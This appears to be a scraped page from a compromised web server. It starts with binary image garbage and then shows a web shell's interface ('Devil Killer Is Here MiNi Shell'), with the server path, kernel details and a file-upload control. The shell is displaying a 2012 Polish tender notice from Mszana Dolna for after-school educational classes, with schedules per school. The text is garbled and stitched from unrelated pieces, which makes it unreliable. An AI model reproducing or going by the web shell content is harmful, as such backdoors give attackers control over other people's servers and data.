JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120809/294694-N-2012.html

<p class="kh_header"><b>Mszana Dolna: Realizacja zajęć dodatkowych, wspierających indywidualizację procesu
nauczania w ramach  projektu systemowego pn: Indywidualizacja
nauczania w klasach I-III szkół podstawowych na terenie Gminy Mszana Dolna</b><br>
<b>Numer ogłoszenia: 294694 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Spadochroniarzy 6, 34-730 Mszana Dolna, woj. małopolskie, tel. 018 3310009 w. 615, 3319815, faks 018 3311242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zajęć dodatkowych, wspierających indywidualizację procesu
nauczania w ramach  projektu systemowego pn: Indywidualizacja
nauczania w klasach I-III szkół podstawowych na terenie Gminy Mszana Dolna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące prowadzenie zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Mszana Dolna  w ramach Projektu Indywidualizacja nauczania w klasach I-III szkół podstawowych na terenie Gminy Mszana Dolna współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
2. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
3. Zamówienie obejmuje: prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji, zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, z języka angielskiego, zajęcia logopedyczne, terapeutyczne, rewalidacyjne, terapii pedagogicznej, prowadzenie gimnastyki korekcyjnej dla dzieci z wadami postawy,  a także rozwijających zainteresowania uczniów uzdolnionych z uwzględnieniem zajęć matematycznych, przyrodniczych, polonistycznych, z j. angielskiego, informatyczne, plastyczne, zajęcia rytmiczno-taneczne i gry na instrumentach oraz narciarstwo i basen.
4. Zamawiający przedmiot zamówienia podzielił na zadania od nr 1 - 20.  
5. Wykonawca - Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów, działania dostosowywane będą do potrzeb uczniów w ramach zajęć. 
6. Do obowiązków prowadzącego będzie należało między innymi: -  prowadzenie zajęć pozalekcyjnych (zajęcia po obowiązkowych lekcjach w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie maksymalnym do 30 czerwca 2013 roku;  - dokumentowanie zajęć pozalekcyjnych (kart czasu pracy, dzienników zajęć, list obecności); -sporządzanie sprawozdań półrocznych z realizacji zajęć, współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia;                                                                                                 Ponadto Wykonawca zobowiązany jest do opracowania w terminie 7 dni od daty zawarcia umowy, programu i planu pracy zajęć pozalekcyjnych obejmujących harmonogram oraz zakres zadania dla uczestników projektu  i przedstawienia do akceptacji dyrektorowi szkoły i koordynatorowi projektu.

Zamawiający w ramach zadań podzielonych na części dopuszcza składanie ofert częściowych.  Każdy z Wykonawców może złożyć ofertę na wybrane przez siebie części zadań.
Zad. Nr 1)  Przetarg nieograniczony - Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także  zagrożonych ryzykiem dysleksji - 13 części. 
Lp.	Szkoły	      L.godz. Rok 2012	Rok 2013	Ilość grup	     L.ucz.
1.      SP 1 Lubomierz	90	    36	          54	       3 GR (po 30 h)	15
2.	SP 2 Lubomierz   120	    48	          72	       2 GR (po 60 h)	10
3.	SP 1 M. Górna	60	    24           36	       2 GR (po 30 h)	10
4.	SP 2 M. Górna	30	    12	          18	       1 GR	                 5
5.	SP Glisne	        30	    12	          18	       1 GR	                 5
6.	SP 1 Kasinka Mała	90	    36	          54	       3 GR (po 30 h)	15
7.	SP 2 Kasinka M.	30	    12	          18	       1 GR	                 5
8.	SP 3 Kasinka M.	30	    12	          18	       1 GR	                 5
9.	SP Łostówka	30	    12	          18	       1 GR	                 5
10.	SP Łętowe	        60	    24	          36	2 GR (po 30 h)	        10
11.	SP Olszówka	60	    24           36	       1 GR	                 5
12.	SP Raba Niżna	60	    24	          36	2 GR (po 30 h)	        10
13.	SP Kasina Wielka	180	    72	         108	6 GR(po 30 h)	        30


Zad. Nr 2) Przetarg nieograniczony - Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 12 części

Lp.	Szkoły	      L.godz. Rok 2012	Rok 2013	Ilość grup	     L.ucz. 
1.	SP 1 Lubomierz	90	    36	         54	     3 GR (po 30 h)	24
2.	SP 2 Lubomierz	60	    24	         36	          1 GR	        7
3.	SP 1 Mszana G.  120	    48	         72	     2 GR (po 60 h)	12
4.	SP 2 Mszana G.	30	    12	         18	           1 GR	         6
5.	SP Glisne	        30	    12	         18	           1 GR	         5
6.	SP 1 Kasinka M.	90	    36	         54	     3 GR (po 30 h)	17
7.	SP 3 Kasinka M.	30	    12    	18	           1 GR	         6
8.	SP Łostówka	30	    12    	18	           1 GR	         8
9.	SP Łętowe	        60	    24	        36	     2 GR (po 30 h)	16
10.	SP Olszówka	60	    24 	36	           1 GR	         8
11.	SP Raba Niżna	60	    24	        36	     2 GR (po 30 h)	16
12.	SP Kasina Wielka	180	    72       108	      6 GR(po 30 h)	44


Zad. Nr 3) Przetarg nieograniczony - Zajęcia logopedyczne 11 części. 
Lp.	Szkoły	        L.godz. Rok 2012	Rok 2013	Ilość grup	   L.ucz.
1.	SP 2 Lubomierz	120	      48	   72	     2 GR (po 60 h)	8
2.	SP 1 Mszana G.	 30	      12	   18	           1 GR	        4
3.	SP 2 Mszana G.	 30	      12	   18	           1 GR	        4
4.	SP Glisne	         30	      12	   18	           1 GR	        4
5.	SP 1 Kasinka M.	 60	      24	   36	      2 GR (po 30 h)	8
6.	SP 2 Kasinka M.	 60	      24	   36	      2 GR (po 30 h)	7
7.	SP Łostówka	 60	      24	   36	      2 GR (po 30 h)	8
8.	SP Łętowe	         60	      24	   36	      2 GR (po 30 h)	8
9.	SP Olszówka	120	      48	   72	      2 GR (po 60 h)	8
10.	SP Raba Niżna	 60	      24	   36	      2 GR (po 30 h)	6
11.	SP Kasina Wielka	 60	      24	   36	     2 GR (po 30 h)	8

Zad. Nr 4) Przetarg nieograniczony - Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji  społecznej 2 części.
Lp.	Szkoły	      L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 2 Mszana G.	30	      12	18	         1 GR	             4
2.	SP Glisne	        30	      12	18	         1 GR	             1

Zad. Nr 5) Przetarg nieograniczony - Specjalistyczne zajęcia terapeutyczne - biblioterapia.

Lp.	Szkoły	   L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP Łostówka 	30	12	          18	         1 GR	          6


Zad. Nr 6) Przetarg nieograniczony - Zajęcia rewalidacyjne.
Lp.	Szkoły	    L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP Łostówka 	30	12	            18    	1 GR   	2

Zad. Nr 7) Przetarg nieograniczony - Terapia pedagogiczna 2 części.
Lp.	Szkoły	     L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 1 Mszana G.	30	  12	           18	          1 GR	4
2.	SP Kasina W.	60	  24	           36	    2 GR (po 30 h)	6

Zad. Nr 8)  Przetarg nieograniczony - Zajęcia z j. angielskiego dla dzieci z trudnościami w nauce.
Lp.	Szkoły	L.godz. Rok 2012	Rok 2013	Ilość grup	     L.ucz.
1.   SP Raba N. 	   60	       24	    36	      2 GR (po 30 h)	16


Zad. Nr 9) Przetarg nieograniczony - Zajęcia matematyczno-przyrodnicze rozwijające uzdolnienia - 6 części
Lp.	Szkoły	        L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 2 Lubomierz	  60	         24	     36	1 GR	          7
2.	SP 1 Kasinka M.	  30	         12	     18	1 GR	          8
3.	SP 3 Kasinka M.	  60	         24	     36	1 GR	          4
4.	SP Olszówka	  60	         24	     36	1 GR	          8
5.	SP Raba Niżna	  30	         12	     18	1 GR	          8
6.	SP Kasina Wielka	120	         48	     72 4 GR (po 30 h)	 32

Zad. Nr 10) Przetarg nieograniczony - Zajęcia przyrodnicze rozwijające uzdolnieni - 3 części
Lp.	Szkoły	      L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 1 Mszana G.	60	     24	   36	          1 GR	8
2.	SP Glisne	        30	     12	   18	          1 GR	8
3.	SP 2 Kasinka M.	30	     12	   18	          1 GR	8

Zad. Nr 11) Przetarg nieograniczony - Zajęcia matematyczne rozwijające uzdolnienia - 2 części.
Lp.	Szkoły	      L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 2 Kasinka M.	 30	     12	    18	          1 GR	8
2.	SP Łętowe	         30	     12	    18	          1 GR	6


Zad. Nr 12) Przetarg nieograniczony - Zajęcia humanistyczne rozwijające uzdolnienia.

Lp.	Szkoły	L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP Raba N.    30	       12	    18	          1 GR	8

Zad. Nr 13) Przetarg nieograniczony - Zajęcia z j. angielskiego rozwijające uzdolnienia - 7 części
Lp.	Szkoły	       L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 2 Mszana G.	30	      12	18	          1 GR	8
2.	SP 1 Kasinka M.	30	      12	18	          1 GR	8
3.	SP 3 Kasinka M.	30	      12	18	          1 GR	6
4.	SP Łostówka	60	      24	36	2 GR (po 30 h)	12
5.	SP Łętowe	        30	      12	18	          1 GR	6
6.	SP Raba Niżna	30	      12	18	          1 GR	8
7.	SP Kasina Wielka	120	      48	72	4 GR (po 30 h)	32

Zad. Nr 14) Przetarg nieograniczony - Zajęcia rytmiczno-taneczne rozwijające uzdolnienia - 7 części.
Lp.	Szkoły	       L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 1 Lubomierz	30	      12	   18	          1 GR	8
2.	SP Glisne	        30	      12	   18	          1 GR	8
3.	SP 2 Kasinka M.	90	      36	   54	   3 GR (po 30 h)	24
4.	SP 3 Kasinka M.	60	      24	   36	          1 GR	8
5.	SP Łostówka	60	      24	   36	2 GR (po 30 h)	16
6.	SP Olszówka	120	      48	   72	2 GR (po 60 h)	16
7.	SP Kasina Wielka	30	      12	    8	           1 GR	8

Zad. Nr 15) Przetarg nieograniczony - Zajęcia z gry na instrumentach rozwijające uzdolnienia.
Lp.	Szkoły	L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP Glisne 	30	         12	     18	   1 GR	4


Zad. Nr 16) Zajęcia informatyczne rozwijające uzdolnienia.
Lp.	Szkoły	     L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP Łostówka	30	   12	            18	           1 GR	7

Zad. Nr 17) Przetarg nieograniczony: Zajęcia plastyczne rozwijające uzdolnienia
Lp.	Szkoły	       L. godz. 	Rok 2012	Rok 2013	Ilość grup	L. ucz.
1.	SP 1 Lubomierz	 30	              12	    18	          1 GR 	8
2.	SP 1 Mszana G.	 60	              24	    36	          1 GR	7

Zad. Nr 18) Przetarg nieograniczony: Gimnastyka korekcyjna.
Lp.	Szkoły	           L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 1 Lubomierz	     60	   24	            36    2 GR ( po 30 h)  16
2.	SP 1 Mszana G.	     60	   24	            36	   2 GR ( po 30 h)  9
3.	SP 2 Mszana G.	     30	   12	            18	   1 GR	         5
4.	SP Glisne	             30	   12	            18	   1 GR	         6
5.	SP 1 Kasinka M.        90	   36	            54	  3 GR (po 30 h)	18
6.	SP 2 Kasinka M.	     90	   36	            54	3 GR (po 30 h)	24
7.	SP 3 Kasinka M.	     60	   24	            36	          1 GR	7
8.	SP Łostówka	     30	   12	            18	          1 GR	8
9.	SP Łętowe	             60	   24	            36	2 GR (po 30 h)	9
10.	SP Olszówka	     30	   12	            18	          1 GR	5
11.	SP Raba Niżna	     60	   24	            36	2 GR (po 30 h)	12
12	SP Kasina Wielka	     30	   12	           18	          1 GR	8

Zad. Nr 19) Przetarg nieograniczony: Gimnastyka korekcyjna na basenie. 
Lp.	Szkoły	L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP Glisne	30	         12	     18	   1 GR	6
SP Glisne gimnastyka korekcyjna na basenie:
 - 30 godzin w roku szkolnym 2012/2013 1 Grupa 6 osób - nauczyciel prowadzący zajęcia 
 - 30 godzin w roku szkolnym 2012/2013 1 Grupa 6 osób - instruktor na basenie 
 - 30 godzin w roku szkolnym 2012/2013 1 grupa 6 osób - wstęp na basen


Zad. Nr 20) Przetarg nieograniczony: Narciarstwo i basen rozwijające uzdolnienia.
Lp.	Szkoły	      L.godz. Rok 2012	Rok 2013	Ilość grup	L.ucz.
1.	SP 2 Mszana G.	30	      12	     18	  1 GR	8
- 15 godzin w roku szkolnym 2012/2013 ( XI - 3 godz., XII - 3godz., I - 3 godz. II - 3godz. III - 3 godz.) 1 Grupa 8 osobowa - narciarstwo nauczyciel 
- 15 godzin w roku szkolnym 2012/2013 ( IX - 3 godz., X - 3 godz., IV - 3 godz., V - 3 godz. VI - 3 godz.) 1 grupa 8 osobowa - basen nauczyciel
- 15 godzin w roku szkolnym 2012/2013 ( IX - 3 godz., X - 3 godz., IV - 3 godz., V - 3 godz. VI - 3 godz.) 1 Grupa 8 osób - instruktor na basenie 
- 15 godzin w roku szkolnym 2012/2013 ( IX - 3 godz., X - 3 godz., IV - 3 godz., V - 3 godz. VI - 3 godz.)1 grupa 8 osób - wstęp na basen

9. Pod pojęciem godziny należy rozumieć 45 lub 60 minut, w zależności od rodzaju zajęć, zgodnie z zapisami Rozporządzenia Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2010r., Nr 228, poz. 1487). I tak:
1). zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 45 minut,
2). zajęcia z j. angielskiego dla dzieci z trudnościami w nauce - 45 minut, 
3).gimnastyka korekcyjna - 45 minut,
4).zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - 45 minut.
5).zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym zagrożonych
ryzykiem dysleksji - 60 minut,
6).zajęcia logopedyczne - 60 minut,
7).zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji
społecznej - 60 minut,
8).specjalistyczne zajęcia terapeutyczne -  biblioterapia - 60 minut,
9).zajęcia rewalidacyjne - 60 minut,
10). terapia pedagogiczna - 60 minut,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca dysponuje  osobą, która posiada  kwalifikacje uprawniające ją do świadczenia usług będących przedmiotem zamówienia z uwzględnieniem podziału zamawiającego  na zadania,  zgodnie z wymogami  Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400),  oraz Rozporządzenia Ministra Edukacji Narodowej z dnia 7 stycznia 2003 r w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach, dodatkowo osoba która ukończyła studia kierunkowe lub podyplomowe kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej.
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia. Na podstawie załączonego do oferty  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega możliwość dokonania zmian umowy w stosunku do treści oferty: 
1) w przypadku wystąpienia siły wyższej, czyli zdarzenia, którego nie można było przewidzieć, maksymalny okres przesunięcia terminu zakończenia umowy będzie równy okresowi przerwy w świadczeniu usługi. Siła wyższa, to zdarzenie zewnętrzne o obiektywnie małym stopniu prawdopodobieństwa pojawienia się zdarzenia w określonej sytuacji, a którego szkodliwe następstwo przy zastosowaniu współczesnej techniki uniemożliwia wykonawcy wykonywanie w części lub całości jego zobowiązań;
 2) w wyniku zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć w chwili podpisania umowy np.: 
a) wystąpienia nieprzewidzianych oraz niekorzystnych ze względu na m. in. interes publiczny warunków mających wpływ na jakość usługi, 
b) dokonanie zmian ilości grup, godzin oraz bloków edukacyjnych - zmiany uzasadnione ujawnionymi w trakcie realizacji przedmiotu zamówienia potrzebami, 
c) dokonanie zmian i zakresu tematyki zajęć ujawnione w trakcie realizacji przedmiotu zamówienia, a wynikające z zdiagnozowanych potrzeb uczniów, 
d) dokonanie zmian (w uzasadnionych wypadkach, na Wniosek Zamawiającego) kadry pedagogicznej, e) zmiany umowy o dofinansowanie realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mszana.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mszana Dolna ul. Spadochroniarzy 6 pok. nr 44.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 09:00, miejsce: Urząd Gminy 34-730 Mszana Dolna ul. Spadochroniarzy 6 pok. nr 32.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




